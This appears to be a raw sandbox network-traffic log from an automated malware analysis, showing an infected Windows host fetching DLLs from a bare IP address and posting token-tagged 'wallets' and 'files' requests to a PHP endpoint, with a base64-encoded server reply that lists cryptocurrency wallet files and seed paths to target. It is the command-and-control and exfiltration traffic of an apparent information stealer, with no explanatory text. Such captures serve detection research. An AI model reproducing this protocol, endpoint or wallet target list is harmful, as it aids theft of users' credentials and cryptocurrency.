9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 25, 2024 09:04:12.906718016 CEST	90	OUT	GET /15f649199f40275b/nss3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:13.226200104 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:13 GMT Content-Type: application/x-msdos-program Content-Length: 2046288 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Apr 25, 2024 09:04:14.240869999 CEST	94	OUT	GET /15f649199f40275b/softokn3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:14.554730892 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:14 GMT Content-Type: application/x-msdos-program Content-Length: 257872 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Apr 25, 2024 09:04:14.809254885 CEST	98	OUT	GET /15f649199f40275b/vcruntime140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 09:04:15.128218889 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:15 GMT Content-Type: application/x-msdos-program Content-Length: 80880 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Apr 25, 2024 09:04:15.979199886 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB Host: 185.172.128.76 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 09:04:16.319063902 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 09:04:16.432490110 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDG Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"wallets------KJDHCAFCGDAAKEBFIJDG--
Apr 25, 2024 09:04:16.752981901 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 07:04:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2408 Connection: keep-alive Vary: Accept-Encoding Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49 Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
Apr 25, 2024 09:04:16.755933046 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDB Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="message"files------AFCFHJJECAEHJJKEHIDB--
